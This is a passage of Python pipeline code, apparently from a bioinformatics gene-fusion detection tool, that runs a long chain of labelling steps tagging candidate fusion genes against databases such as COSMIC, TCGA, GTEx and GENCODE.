    job.add(_FC_+'label_fusion_genes.py',kind='program')
    job.add('--input',outdir('candidate_fusion-genes_11.txt'),kind='input',temp_path=temp_flag)
    job.add('--label','pseudogene',kind='parameter')
    job.add('--filter_genes',datadir('pseudogenes.txt'),kind='input')
    job.add('--output_fusion_genes',outdir('candidate_fusion-genes_12.txt'),kind='output')
    job.run()

    # label fusion genes -- rRNA (again)
    job.add(_FC_+'label_fusion_genes.py',kind='program')
    job.add('--input',outdir('candidate_fusion-genes_12.txt'),kind='input',temp_path=temp_flag)
    job.add('--label','rrna',kind='parameter')
    job.add('--filter_genes',datadir('rrnas.txt'),kind='input')
    job.add('--output_fusion_genes',outdir('candidate_fusion-genes_13.txt'),kind='output')
    job.run()

    # label fusion genes -- tRNA
    job.add(_FC_+'label_fusion_genes.py',kind='program')
    job.add('--input',outdir('candidate_fusion-genes_13.txt'),kind='input',temp_path=temp_flag)
    job.add('--label','trna',kind='parameter')
    job.add('--filter_genes',datadir('trnas.txt'),kind='input')
    job.add('--output_fusion_genes',outdir('candidate_fusion-genes_14.txt'),kind='output')
    job.run()

    # label fusion genes -- miRNA
    job.add(_FC_+'label_fusion_genes.py',kind='program')
    job.add('--input',outdir('candidate_fusion-genes_14.txt'),kind='input',temp_path=temp_flag)
    job.add('--label','mirna',kind='parameter')
    job.add('--filter_genes',datadir('mirnas.txt'),kind='input')
    job.add('--output_fusion_genes',outdir('candidate_fusion-genes_15.txt'),kind='output')
    job.run()
    # label fusion genes -- lncRNA
    job.add(_FC_+'label_fusion_genes.py',kind='program')
    job.add('--input',outdir('candidate_fusion-genes_15.txt'),kind='input',temp_path=temp_flag)
    job.add('--label','lncrna',kind='parameter')
    job.add('--filter_genes',datadir('lncrnas.txt'),kind='input')
    job.add('--output_fusion_genes',outdir('candidate_fusion-genes_16.txt'),kind='output')
    job.run()

    # label fusion genes -- MT
    job.add(_FC_+'label_fusion_genes.py',kind='program')
    job.add('--input',outdir('candidate_fusion-genes_16.txt'),kind='input',temp_path=temp_flag)
    job.add('--label','mt',kind='parameter')
    job.add('--filter_genes',datadir('mt.txt'),kind='input')
    job.add('--output_fusion_genes',outdir('candidate_fusion-genes_17.txt'),kind='output')
    job.run()

    # label fusion genes -- snoRNA
    job.add(_FC_+'label_fusion_genes.py',kind='program')
    job.add('--input',outdir('candidate_fusion-genes_17.txt'),kind='input',temp_path=temp_flag)
    job.add('--label','snorna',kind='parameter')
    job.add('--filter_genes',datadir('snornas.txt'),kind='input')
    job.add('--output_fusion_genes',outdir('candidate_fusion-genes_18.txt'),kind='output')
    job.run()

    # label fusion genes -- snRNA
    job.add(_FC_+'label_fusion_genes.py',kind='program')
    job.add('--input',outdir('candidate_fusion-genes_18.txt'),kind='input',temp_path=temp_flag)
    job.add('--label','snrna',kind='parameter')
    job.add('--filter_genes',datadir('snrnas.txt'),kind='input')
    job.add('--output_fusion_genes',outdir('candidate_fusion-genes_19.txt'),kind='output')
    job.run()

    # label fusion genes -- Y RNAs
    job.add(_FC_+'label_fusion_genes.py',kind='program')
    job.add('--input',outdir('candidate_fusion-genes_19.txt'),kind='input',temp_path=temp_flag)
    job.add('--label','yrna',kind='parameter')
    job.add('--filter_genes',datadir('rnas_y.txt'),kind='input')
    job.add('--output_fusion_genes',outdir('candidate_fusion-genes_20.txt'),kind='output')
    job.run()

    # label fusion genes -- 7SK RNAs
    job.add(_FC_+'label_fusion_genes.py',kind='program')
    job.add('--input',outdir('candidate_fusion-genes_20.txt'),kind='input',temp_path=temp_flag)
    job.add('--label','7skrna',kind='parameter')
    job.add('--filter_genes',datadir('7skrnas.txt'),kind='input')
    job.add('--output_fusion_genes',outdir('candidate_fusion-genes_21.txt'),kind='output')
    job.run()

    # label fusion genes -- metastasis
    job.add(_FC_+'label_fusion_genes.py',kind='program')
    job.add('--input',outdir('candidate_fusion-genes_21.txt'),kind='input',temp_path=temp_flag)
    job.add('--label','metastasis',kind='parameter')
    job.add('--filter_genes',datadir('metastasis.txt'),kind='input')
    job.add('--output_fusion_genes',outdir('candidate_fusion-genes_22.txt'),kind='output')
    job.run()

    # # label fusion genes -- antisense
    # job.add(_FC_+'label_fusion_genes.py',kind='program')
    # job.add('--input',outdir('candidate_fusion-genes_21.txt'),kind='input',temp_path=temp_flag)
    # job.add('--label','antisense',kind='parameter')
    # job.add('--filter_genes',datadir('antisenses.txt'),kind='input')
    # job.add('--output_fusion_genes',outdir('candidate_fusion-genes_22.txt'),kind='output')
    # job.run()

    # label fusion genes -- pairs of pseudogenes
    job.add(_FC_+'label_fusion_genes.py',kind='program')
    job.add('--input',outdir('candidate_fusion-genes_22.txt'),kind='input',temp_path=temp_flag)
    job.add('--label','pair_pseudo_genes',kind='parameter')
    job.add('--filter_gene_pairs',datadir('pairs_pseudogenes.txt'),kind='input')
    job.add('--output_fusion_genes',outdir('candidate_fusion-genes_23.txt'),kind='output')
    job.run()
    # label fusion genes -- ribosomal proteins
    job.add(_FC_+'label_fusion_genes.py',kind='program')
    job.add('--input',outdir('candidate_fusion-genes_23.txt'),kind='input',temp_path=temp_flag)
    job.add('--label','ribosomal',kind='parameter')
    job.add('--filter_genes',datadir('ribosomal_proteins.txt'),kind='input')
    job.add('--output_fusion_genes',outdir('candidate_fusion-genes_24.txt'),kind='output')
    job.run()

    # label fusion genes -- oncogenes
    job.add(_FC_+'label_fusion_genes.py',kind='program')
    job.add('--input',outdir('candidate_fusion-genes_24.txt'),kind='input',temp_path=temp_flag)
    job.add('--label','oncogene',kind='parameter')
    job.add('--filter_genes',datadir('oncogenes_more.txt'),kind='input')
    job.add('--output_fusion_genes',outdir('candidate_fusion-genes_25.txt'),kind='output')
    job.run()

    # label fusion genes -- cosmic
    job.add(_FC_+'label_fusion_genes.py',kind='program')
    job.add('--input',outdir('candidate_fusion-genes_25.txt'),kind='input',temp_path=temp_flag)
    job.add('--label','cosmic',kind='parameter')
    job.add('--filter_gene_pairs',datadir('cosmic.txt'),kind='input')
    job.add('--output_fusion_genes',outdir('candidate_fusion-genes_27.txt'),kind='output')
    job.run()

    # label fusion genes -- ChimerDB 2.0
    job.add(_FC_+'label_fusion_genes.py',kind='program')
    job.add('--input',outdir('candidate_fusion-genes_27.txt'),kind='input',temp_path=temp_flag)
    job.add('--label','chimer2',kind='parameter')
    job.add('--filter_gene_pairs',datadir('chimerdb2.txt'),kind='input')
    job.add('--output_fusion_genes',outdir('candidate_fusion-genes_28.txt'),kind='output')
    job.run()

    # label fusion genes -- CGP
    job.add(_FC_+'label_fusion_genes.py',kind='program')
    job.add('--input',outdir('candidate_fusion-genes_28.txt'),kind='input',temp_path=temp_flag)
    job.add('--label','cgp',kind='parameter')
    job.add('--filter_gene_pairs',datadir('cgp.txt'),kind='input')
    job.add('--output_fusion_genes',outdir('candidate_fusion-genes_29.txt'),kind='output')
    job.run()

    # label fusion genes -- ConjoinG
    job.add(_FC_+'label_fusion_genes.py',kind='program')
    job.add('--input',outdir('candidate_fusion-genes_29.txt'),kind='input',temp_path=temp_flag)
    job.add('--label','conjoing',kind='parameter')
    job.add('--filter_gene_pairs',datadir('conjoing.txt'),kind='input')
    job.add('--output_fusion_genes',outdir('candidate_fusion-genes_30.txt'),kind='output')
    job.run()

    # label fusion genes -- TICdb
    job.add(_FC_+'label_fusion_genes.py',kind='program')
    job.add('--input',outdir('candidate_fusion-genes_30.txt'),kind='input',temp_path=temp_flag)
    job.add('--label','ticdb',kind='parameter')
    job.add('--filter_gene_pairs',datadir('ticdb.txt'),kind='input')
    job.add('--output_fusion_genes',outdir('candidate_fusion-genes_31.txt'),kind='output')
    job.run()
    # # label fusion genes -- RP11-... genes
    # job.add(_FC_+'label_fusion_genes.py',kind='program')
    # job.add('--input',outdir('candidate_fusion-genes_31.txt'),kind='input',temp_path=temp_flag)
    # job.add('--label','rp11',kind='parameter')
    # job.add('--filter_genes',datadir('rp11.txt'),kind='input')
    # job.add('--output_fusion_genes',outdir('candidate_fusion-genes_32.txt'),kind='output')
    # job.run()

    # # label fusion genes -- CTA-... genes
    # job.add(_FC_+'label_fusion_genes.py',kind='program')
    # job.add('--input',outdir('candidate_fusion-genes_32.txt'),kind='input',temp_path=temp_flag)
    # job.add('--label','cta',kind='parameter')
    # job.add('--filter_genes',datadir('cta.txt'),kind='input')
    # job.add('--output_fusion_genes',outdir('candidate_fusion-genes_33.txt'),kind='output')
    # job.run()

    # # label fusion genes -- CTB-... genes
    # job.add(_FC_+'label_fusion_genes.py',kind='program')
    # job.add('--input',outdir('candidate_fusion-genes_33.txt'),kind='input',temp_path=temp_flag)
    # job.add('--label','ctb',kind='parameter')
    # job.add('--filter_genes',datadir('ctb.txt'),kind='input')
    # job.add('--output_fusion_genes',outdir('candidate_fusion-genes_34.txt'),kind='output')
    # job.run()

    # # label fusion genes -- CTD-... genes
    # job.add(_FC_+'label_fusion_genes.py',kind='program')
    # job.add('--input',outdir('candidate_fusion-genes_34.txt'),kind='input',temp_path=temp_flag)
    # job.add('--label','ctd',kind='parameter')
    # job.add('--filter_genes',datadir('ctd.txt'),kind='input')
    # job.add('--output_fusion_genes',outdir('candidate_fusion-genes_35.txt'),kind='output')
    # job.run()

    # # label fusion genes -- CTC-... genes
    # job.add(_FC_+'label_fusion_genes.py',kind='program')
    # job.add('--input',outdir('candidate_fusion-genes_35.txt'),kind='input',temp_path=temp_flag)
    # job.add('--label','ctc',kind='parameter')
    # job.add('--filter_genes',datadir('ctc.txt'),kind='input')
    # job.add('--output_fusion_genes',outdir('candidate_fusion-genes_36.txt'),kind='output')
    # job.run()

    # # label fusion genes -- RP??-... genes
    # job.add(_FC_+'label_fusion_genes.py',kind='program')
    # job.add('--input',outdir('candidate_fusion-genes_36.txt'),kind='input',temp_path=temp_flag)
    # job.add('--label','rp',kind='parameter')
    # job.add('--filter_genes',datadir('rp.txt'),kind='input')
    # job.add('--output_fusion_genes',outdir('candidate_fusion-genes_37.txt'),kind='output')
    # job.run()

    # label fusion genes -- found in healthy samples
    job.add(_FC_+'label_fusion_genes.py',kind='program')
    job.add('--input',outdir('candidate_fusion-genes_31.txt'),kind='input',temp_path=temp_flag)
    job.add('--label','healthy',kind='parameter')
    job.add('--filter_gene_pairs',datadir('healthy.txt'),kind='input')
    job.add('--output_fusion_genes',outdir('candidate_fusion-genes_38.txt'),kind='output')
    job.run()

    # label fusion genes -- CACG
    job.add(_FC_+'label_fusion_genes.py',kind='program')
    job.add('--input',outdir('candidate_fusion-genes_38.txt'),kind='input',temp_path=temp_flag)
    job.add('--label','cacg',kind='parameter')
    job.add('--filter_gene_pairs',datadir('cacg.txt'),kind='input')
    job.add('--output_fusion_genes',outdir('candidate_fusion-genes_39.txt'),kind='output')
    job.run()
    # label fusion genes -- fully overlapping in UCSC
    job.add(_FC_+'label_fusion_genes.py',kind='program')
    job.add('--input',outdir('candidate_fusion-genes_39.txt'),kind='input',temp_path=temp_flag)
    job.add('--label','ucsc_fully_overlapping',kind='parameter')
    job.add('--filter_gene_pairs',datadir('ucsc_fully_overlapping_genes.txt'),kind='input')
    job.add('--output_fusion_genes',outdir('candidate_fusion-genes_40.txt'),kind='output')
    job.run()

    # label fusion genes -- partially overlapping in UCSC
    job.add(_FC_+'label_fusion_genes.py',kind='program')
    job.add('--input',outdir('candidate_fusion-genes_40.txt'),kind='input',temp_path=temp_flag)
    job.add('--label','ucsc_partially_overlapping',kind='parameter')
    job.add('--filter_gene_pairs',datadir('ucsc_partially_overlapping_genes.txt'),kind='input')
    job.add('--output_fusion_genes',outdir('candidate_fusion-genes_41.txt'),kind='output')
    job.run()

    # label fusion genes -- overlapping and on same strand in UCSC
    job.add(_FC_+'label_fusion_genes.py',kind='program')
    job.add('--input',outdir('candidate_fusion-genes_41.txt'),kind='input',temp_path=temp_flag)
    job.add('--label','ucsc_same_strand_overlapping',kind='parameter')
    job.add('--filter_gene_pairs',datadir('ucsc_same_strand_overlapping_genes.txt'),kind='input')
    job.add('--output_fusion_genes',outdir('candidate_fusion-genes_42.txt'),kind='output')
    job.run()

    # label fusion genes -- fully overlapping in RefSeq
    job.add(_FC_+'label_fusion_genes.py',kind='program')
    job.add('--input',outdir('candidate_fusion-genes_42.txt'),kind='input',temp_path=temp_flag)
    job.add('--label','refseq_fully_overlapping',kind='parameter')
    job.add('--filter_gene_pairs',datadir('refseq_fully_overlapping_genes.txt'),kind='input')
    job.add('--output_fusion_genes',outdir('candidate_fusion-genes_43.txt'),kind='output')
    job.run()

    # label fusion genes -- partially overlapping in RefSeq
    job.add(_FC_+'label_fusion_genes.py',kind='program')
    job.add('--input',outdir('candidate_fusion-genes_43.txt'),kind='input',temp_path=temp_flag)
    job.add('--label','refseq_partially_overlapping',kind='parameter')
    job.add('--filter_gene_pairs',datadir('refseq_partially_overlapping_genes.txt'),kind='input')
    job.add('--output_fusion_genes',outdir('candidate_fusion-genes_44.txt'),kind='output')
    job.run()

    # label fusion genes -- overlapping and on same strand in RefSeq
    job.add(_FC_+'label_fusion_genes.py',kind='program')
    job.add('--input',outdir('candidate_fusion-genes_44.txt'),kind='input',temp_path=temp_flag)
    job.add('--label','refseq_same_strand_overlapping',kind='parameter')
    job.add('--filter_gene_pairs',datadir('refseq_same_strand_overlapping_genes.txt'),kind='input')
    job.add('--output_fusion_genes',outdir('candidate_fusion-genes_45.txt'),kind='output')
    job.run()

    # label fusion genes -- duplicated genes from DGD database
    job.add(_FC_+'label_fusion_genes.py',kind='program')
    job.add('--input',outdir('candidate_fusion-genes_45.txt'),kind='input',temp_path=temp_flag)
    job.add('--label','duplicates',kind='parameter')
    job.add('--filter_gene_pairs',datadir('dgd.txt'),kind='input')
    job.add('--output_fusion_genes',outdir('candidate_fusion-genes_46.txt'),kind='output')
    job.run()

    # label fusion genes -- TCGA
    job.add(_FC_+'label_fusion_genes.py',kind='program')
    job.add('--input',outdir('candidate_fusion-genes_46.txt'),kind='input',temp_path=temp_flag)
    job.add('--label','tcga',kind='parameter')
    job.add('--filter_gene_pairs',datadir('tcga.txt'),kind='input')
    job.add('--output_fusion_genes',outdir('candidate_fusion-genes_47.txt'),kind='output')
    job.run()

    # label fusion genes -- BodyMap2
    job.add(_FC_+'label_fusion_genes.py',kind='program')
    job.add('--input',outdir('candidate_fusion-genes_47.txt'),kind='input',temp_path=temp_flag)
    job.add('--label','bodymap2',kind='parameter')
    job.add('--filter_gene_pairs',datadir('bodymap2.txt'),kind='input')
    job.add('--output_fusion_genes',outdir('candidate_fusion-genes_48.txt'),kind='output')
    job.run()

    # label fusion genes -- Metazoa
    job.add(_FC_+'label_fusion_genes.py',kind='program')
    job.add('--input',outdir('candidate_fusion-genes_48.txt'),kind='input',temp_path=temp_flag)
    job.add('--label','metazoa',kind='parameter')
    job.add('--filter_genes',datadir('metazoa.txt'),kind='input')
    job.add('--output_fusion_genes',outdir('candidate_fusion-genes_49.txt'),kind='output')
    job.run()

    # label fusion genes -- cell lines
    job.add(_FC_+'label_fusion_genes.py',kind='program')
    job.add('--input',outdir('candidate_fusion-genes_49.txt'),kind='input',temp_path=temp_flag)
    job.add('--label','ccle2',kind='parameter')
    job.add('--filter_gene_pairs',datadir('ccle2.txt'),kind='input')
    job.add('--output_fusion_genes',outdir('candidate_fusion-genes_50.txt'),kind='output')
    job.run()
    # label fusion genes -- ambiguous (only if the ambiguous counts > supporting pairs)
    job.add(_FC_+'label_ambiguous_fusion_genes.py',kind='program')
    job.add('--input',outdir('candidate_fusion-genes_50.txt'),kind='input',temp_path=temp_flag)
    job.add('--label','ambiguous',kind='parameter')
    job.add('--factor','20',kind='parameter') # 15
    job.add('--input_ambiguous',outdir('all_ambiguous_genes.txt'),kind='input')
    job.add('--output_fusion_genes',outdir('candidate_fusion-genes_51.txt'),kind='output')
    job.run()

    # label fusion genes -- fully overlapping in GENCODE
    job.add(_FC_+'label_fusion_genes.py',kind='program')
    job.add('--input',outdir('candidate_fusion-genes_51.txt'),kind='input',temp_path=temp_flag)
    job.add('--label','gencode_fully_overlapping',kind='parameter')
    job.add('--filter_gene_pairs',datadir('gencode_fully_overlapping_genes.txt'),kind='input')
    job.add('--output_fusion_genes',outdir('candidate_fusion-genes_52.txt'),kind='output')
    job.run()

    # label fusion genes -- partially overlapping in GENCODE
    job.add(_FC_+'label_fusion_genes.py',kind='program')
    job.add('--input',outdir('candidate_fusion-genes_52.txt'),kind='input',temp_path=temp_flag)
    job.add('--label','gencode_partially_overlapping',kind='parameter')
    job.add('--filter_gene_pairs',datadir('gencode_partially_overlapping_genes.txt'),kind='input')
    job.add('--output_fusion_genes',outdir('candidate_fusion-genes_53.txt'),kind='output')
    job.run()

    # label fusion genes -- overlapping and on same strand in GENCODE
    job.add(_FC_+'label_fusion_genes.py',kind='program')
    job.add('--input',outdir('candidate_fusion-genes_53.txt'),kind='input',temp_path=temp_flag)
    job.add('--label','gencode_same_strand_overlapping',kind='parameter')
    job.add('--filter_gene_pairs',datadir('gencode_same_strand_overlapping_genes.txt'),kind='input')
    job.add('--output_fusion_genes',outdir('candidate_fusion-genes_54.txt'),kind='output')
    job.run()

    # label fusion genes -- prostate cancer
    job.add(_FC_+'label_fusion_genes.py',kind='program')
    job.add('--input',outdir('candidate_fusion-genes_54.txt'),kind='input',temp_path=temp_flag)
    job.add('--label','prostate_cancer',kind='parameter')
    job.add('--filter_gene_pairs',datadir('prostate_cancer.txt'),kind='input')
    job.add('--output_fusion_genes',outdir('candidate_fusion-genes_55.txt'),kind='output')
    job.run()

    # label fusion genes -- non-tumor cell lines
    job.add(_FC_+'label_fusion_genes.py',kind='program')
    job.add('--input',outdir('candidate_fusion-genes_55.txt'),kind='input',temp_path=temp_flag)
    job.add('--label','non_tumor_cells',kind='parameter')
    job.add('--filter_gene_pairs',datadir('non-tumor_cells.txt'),kind='input')
    job.add('--output_fusion_genes',outdir('candidate_fusion-genes_56.txt'),kind='output')
    job.run()

    # label with focus the fusions which are given by the user
    if options.focus_fusions and not empty(options.focus_fusions):
        job.add(_FC_+'label_fusion_genes.py',kind='program')
        job.add('--input',outdir('candidate_fusion-genes_56.txt'),kind='input',temp_path=temp_flag)
        job.add('--label','focus',kind='parameter')
        job.add('--filter_gene_pairs',options.focus_fusions,kind='input')
        job.add('--output_fusion_genes',outdir('candidate_fusion-genes_57.txt'),kind='output')
        job.run()
    else:
        job.link(outdir('candidate_fusion-genes_56.txt'),outdir('candidate_fusion-genes_57.txt'),temp_path=temp_flag)
    # label fusion genes -- fragments which fall below the spanning pairs in case of fragmentation
    if fragments_flag:
        job.add(_FC_+'label_fusion_genes.py',kind='program')
        job.add('--input',outdir('candidate_fusion-genes_57.txt'),kind='input',temp_path=temp_flag)
        job.add('--label','fragments',kind='parameter')
        job.add('--filter_gene_pairs',outdir('candidate_fusion-genes_fragments.txt'),kind='input',temp_path=temp_flag)
        job.add('--output_fusion_genes',outdir('candidate_fusion-genes_58.txt'),kind='output')
        job.run()
    else:
        job.link(outdir('candidate_fusion-genes_57.txt'),outdir('candidate_fusion-genes_58.txt'),temp_path=temp_flag)

    # label fusion genes -- Human Protein Atlas (hpa)
    job.add(_FC_+'label_fusion_genes.py',kind='program')
    job.add('--input',outdir('candidate_fusion-genes_58.txt'),kind='input',temp_path=temp_flag)
    job.add('--label','hpa',kind='parameter')
    job.add('--filter_gene_pairs',datadir('hpa.txt'),kind='input')
    job.add('--output_fusion_genes',outdir('candidate_fusion-genes_59.txt'),kind='output')
    job.run()

    # label fusion genes -- genes closer than 200,000 bp (on the same strand)
    job.add(_FC_+'label_fusion_genes.py',kind='program')
    job.add('--input',outdir('candidate_fusion-genes_59.txt'),kind='input',temp_path=temp_flag)
    job.add('--label','dist200kbp',kind='parameter')
    job.add('--min_dist_gene_gene','200000',kind='parameter')
    job.add('--min_dist_gene_gene_database',datadir('exons.txt'),kind='input')
    job.add('--output_fusion_genes',outdir('candidate_fusion-genes_60.txt'),kind='output')
    job.run()

    # label fusion genes -- GTEx
    job.add(_FC_+'label_fusion_genes.py',kind='program')
    job.add('--input',outdir('candidate_fusion-genes_60.txt'),kind='input',temp_path=temp_flag)
    job.add('--label','gtex',kind='parameter')
    job.add('--filter_gene_pairs',datadir('gtex.txt'),kind='input')
    job.add('--output_fusion_genes',outdir('candidate_fusion-genes_61.txt'),kind='output')
    job.run()

    # label fusion genes -- non-cancer tissues
    job.add(_FC_+'label_fusion_genes.py',kind='program')
    job.add('--input',outdir('candidate_fusion-genes_61.txt'),kind='input',temp_path=temp_flag)
    job.add('--label','non_cancer_tissues',kind='parameter')
    job.add('--filter_gene_pairs',datadir('non-cancer_tissues.txt'),kind='input')
    job.add('--output_fusion_genes',outdir('candidate_fusion-genes_62.txt'),kind='output')
    job.run()

    # label fusion genes -- hla
    job.add(_FC_+'label_fusion_genes.py',kind='program')
    job.add('--input',outdir('candidate_fusion-genes_62.txt'),kind='input',temp_path=temp_flag)
    job.add('--label','hla',kind='parameter')
    job.add('--filter_genes',datadir('hla.txt'),kind='input')
    job.add('--output_fusion_genes',outdir('candidate_fusion-genes_63.txt'),kind='output')
    job.run()

    # label fusion genes -- 1000 genomes
    job.add(_FC_+'label_fusion_genes.py',kind='program')
    job.add('--input',outdir('candidate_fusion-genes_63.txt'),kind='input',temp_path=temp_flag)
    job.add('--label','1000genomes',kind='parameter')
    job.add('--filter_gene_pairs',datadir('1000genomes.txt'),kind='input')
    job.add('--output_fusion_genes',outdir('candidate_fusion-genes_64.txt'),kind='output')
    job.run()

    # label fusion genes -- 18 cancers
    job.add(_FC_+'label_fusion_genes.py',kind='program')
    job.add('--input',outdir('candidate_fusion-genes_64.txt'),kind='input',temp_path=temp_flag)
    job.add('--label','18cancers',kind='parameter')
    job.add('--filter_gene_pairs',datadir('18cancers.txt'),kind='input')
    job.add('--output_fusion_genes',outdir('candidate_fusion-genes_65.txt'),kind='output')
    job.run()
    # label fusion genes -- gliomas
    job.add(_FC_+'label_fusion_genes.py',kind='program')
    job.add('--input',outdir('candidate_fusion-genes_65.txt'),kind='input',temp_path=temp_flag)
    job.add('--label','gliomas',kind='parameter')
    job.add('--filter_gene_pairs',datadir('gliomas.txt'),kind='input')
    job.add('--output_fusion_genes',outdir('candidate_fusion-genes_66.txt'),kind='output')
    job.run()

    # label fusion genes -- ChimerDB (kb, pub, and seq subsets)
    job.add(_FC_+'label_fusion_genes.py',kind='program')
    job.add('--input',outdir('candidate_fusion-genes_66.txt'),kind='input',temp_path=temp_flag)
    job.add('--label','chimer4kb',kind='parameter')
    job.add('--filter_gene_pairs',datadir('chimerdb4kb.txt'),kind='input')
    job.add('--output_fusion_genes',outdir('candidate_fusion-genes_67.txt'),kind='output')
    job.run()

    job.add(_FC_+'label_fusion_genes.py',kind='program')
    job.add('--input',outdir('candidate_fusion-genes_67.txt'),kind='input',temp_path=temp_flag)
    job.add('--label','chimer4pub',kind='parameter')
    job.add('--filter_gene_pairs',datadir('chimerdb4pub.txt'),kind='input')
    job.add('--output_fusion_genes',outdir('candidate_fusion-genes_68.txt'),kind='output')
    job.run()

    job.add(_FC_+'label_fusion_genes.py',kind='program')
    job.add('--input',outdir('candidate_fusion-genes_68.txt'),kind='input',temp_path=temp_flag)
    job.add('--label','chimer4seq',kind='parameter')
    job.add('--filter_gene_pairs',datadir('chimerdb4seq.txt'),kind='input')
    job.add('--output_fusion_genes',outdir('candidate_fusion-genes_69.txt'),kind='output')
    job.run()

    job.add(_FC_+'label_fusion_genes.py',kind='program')
    job.add('--input',outdir('candidate_fusion-genes_69.txt'),kind='input',temp_path=temp_flag)
    job.add('--label','cancer',kind='parameter')
    job.add('--filter_genes',datadir('cancer_genes.txt'),kind='input')
    job.add('--output_fusion_genes',outdir('candidate_fusion-genes_70.txt'),kind='output')
    job.run()

    job.add(_FC_+'label_fusion_genes.py',kind='program')
    job.add('--input',outdir('candidate_fusion-genes_70.txt'),kind='input',temp_path=temp_flag)
    job.add('--label','tumor',kind='parameter')
    job.add('--filter_genes',datadir('tumor_genes.txt'),kind='input')
    job.add('--output_fusion_genes',outdir('candidate_fusion-genes_71.txt'),kind='output')
    job.run()

    # add label multi-mappers
    job.add(_FC_+'label_multi.py',kind='program')
    job.add('--input',outdir('candidate_fusion-genes_71.txt'),kind='input',temp_path=temp_flag)
    job.add('--label','m,multi',kind='parameter')
    job.add('--pairs',spanning_pairs_minimum,kind='parameter')
    job.add('--data',outdir('candidate_fusion-genes_no-offending-reads.txt'),kind='input',temp_path=temp_flag)
    job.add('--output',outdir('candidate_fusion-genes_72.txt'),kind='output')
    job.run()

    # label fusion genes -- pancreatic
    job.add(_FC_+'label_fusion_genes.py',kind='program')
    job.add('--input',outdir('candidate_fusion-genes_72.txt'),kind='input',temp_path=temp_flag)
    job.add('--label','pancreases',kind='parameter')
    job.add('--filter_gene_pairs',datadir('pancreases.txt'),kind='input')
    job.add('--output_fusion_genes',outdir('candidate_fusion-genes_73.txt'),kind='output')
    job.run()

    # label fusion genes -- tcga-cancer
    job.add(_FC_+'label_fusion_genes.py',kind='program')
    job.add('--input',outdir('candidate_fusion-genes_73.txt'),kind='input',temp_path=temp_flag)
    job.add('--label','tcga-cancer',kind='parameter')
    job.add('--filter_gene_pairs',datadir('tcga-cancer.txt'),kind='input')
    job.add('--output_fusion_genes',outdir('candidate_fusion-genes_74.txt'),kind='output')
    job.run()
    # label fusion genes -- tcga-normal
    job.add(_FC_+'label_fusion_genes.py',kind='program')
    job.add('--input',outdir('candidate_fusion-genes_74.txt'),kind='input',temp_path=temp_flag)
    job.add('--label','tcga-normal',kind='parameter')
    job.add('--filter_gene_pairs',datadir('tcga-normal.txt'),kind='input')
    job.add('--output_fusion_genes',outdir('candidate_fusion-genes_75.txt'),kind='output')
    job.run()

    # label fusion genes -- TCGA2
    job.add(_FC_+'label_fusion_genes.py',kind='program')
    job.add('--input',outdir('candidate_fusion-genes_75.txt'),kind='input',temp_path=temp_flag)
    job.add('--label','tcga2',kind='parameter')
    job.add('--filter_gene_pairs',datadir('tcga2.txt'),kind='input')
    job.add('--output_fusion_genes',outdir('candidate_fusion-genes_76.txt'),kind='output')
    job.run()

    # label fusion genes -- prefrontal cortex
    job.add(_FC_+'label_fusion_genes.py',kind='program')
    job.add('--input',outdir('candidate_fusion-genes_76.txt'),kind='input',temp_path=temp_flag)
    job.add('--label','cortex',kind='parameter')
    job.add('--filter_gene_pairs',datadir('cortex.txt'),kind='input')
    job.add('--output_fusion_genes',outdir('candidate_fusion-genes_77.txt'),kind='output')
    job.run()

    # label rt-circ RNAs
    job.add(_FC_+'label_fusion_genes.py',kind='program')
    job.add('--input',outdir('candidate_fusion-genes_77.txt'),kind='input',temp_path=temp_flag)
    job.add('--label','rt_circ_rna',kind='parameter')
    job.add('--filter_gene_pairs',datadir('rtcircrnas.txt'),kind='input')
    job.add('--output_fusion_genes',outdir('candidate_fusion-genes_78.txt'),kind='output')
    job.run()

    # label OncoKB
    job.add(_FC_+'label_fusion_genes.py',kind='program')
    job.add('--input',outdir('candidate_fusion-genes_78.txt'),kind='input',temp_path=temp_flag)
    job.add('--label','oncokb',kind='parameter')
    job.add('--filter_gene_pairs',datadir('oncokb.txt'),kind='input')
    job.add('--output_fusion_genes',outdir('candidate_fusion-genes_79.txt'),kind='output')
    job.run()

    # label Mitelman
    job.add(_FC_+'label_fusion_genes.py',kind='program')
    job.add('--input',outdir('candidate_fusion-genes_79.txt'),kind='input',temp_path=temp_flag)
    job.add('--label','mitelman',kind='parameter')
    job.add('--filter_gene_pairs',datadir('mitelman.txt'),kind='input')
    job.add('--output_fusion_genes',outdir('candidate_fusion-genes_80.txt'),kind='output')
    job.run()

    # label PCAWG
    job.add(_FC_+'label_fusion_genes.py',kind='program')
    job.add('--input',outdir('candidate_fusion-genes_80.txt'),kind='input',temp_path=temp_flag)
    job.add('--label','pcawg',kind='parameter')
    job.add('--filter_gene_pairs',datadir('pcawg.txt'),kind='input')
    job.add('--output_fusion_genes',outdir('candidate_fusion-genes_81.txt'),kind='output')
    job.run()

    # label CCLE
    job.add(_FC_+'label_fusion_genes.py',kind='program')
    job.add('--input',outdir('candidate_fusion-genes_81.txt'),kind='input',temp_path=temp_flag)
    job.add('--label','ccle',kind='parameter')
    job.add('--filter_gene_pairs',datadir('ccle.txt'),kind='input')
    job.add('--output_fusion_genes',outdir('candidate_fusion-genes_82.txt'),kind='output')
    job.run()

    # label CCLE3
    job.add(_FC_+'label_fusion_genes.py',kind='program')
    job.add('--input',outdir('candidate_fusion-genes_82.txt'),kind='input',temp_path=temp_flag)
    job.add('--label','ccle3',kind='parameter')
    job.add('--filter_gene_pairs',datadir('ccle3.txt'),kind='input')
    job.add('--output_fusion_genes',outdir('candidate_fusion-genes_83.txt'),kind='output')
    job.run()

    # label TCGA3
    job.add(_FC_+'label_fusion_genes.py',kind='program')
    job.add('--input',outdir('candidate_fusion-genes_83.txt'),kind='input',temp_path=temp_flag)
    job.add('--label','tcga3',kind='parameter')
    job.add('--filter_gene_pairs',datadir('tcga3.txt'),kind='input')
    job.add('--output_fusion_genes',outdir('candidate_fusion-genes_84.txt'),kind='output')
    job.run()
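    # Note: gaps and jumps in the _NN numbering above (e.g. _25 -> _27, or the
    # commented-out RP11/CTA/CTB/CTD/CTC blocks) presumably correspond to label
    # passes that were removed or disabled over time.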
    # label fusions with smaller reads in supporting pair-reads
    job.add(_FC_+'label_fusion_genes_trim2.py',kind='program') # trim2
    job.add('--input',outdir('candidate_fusion-genes_84.txt'),kind='input',temp_path=temp_flag)
    job.add('--fusions_pairs',outdir('candidate_fusion-genes_supporting_paired-reads.txt'),kind='input')
    job.add('--smaller_pairs',outdir('reads_not-mapped_trim2_ids.txt'),kind='input',temp_path=temp_flag)
    job.add('--output_fusion_genes',outdir('candidate_fusion-genes_1000.txt'),kind='output')
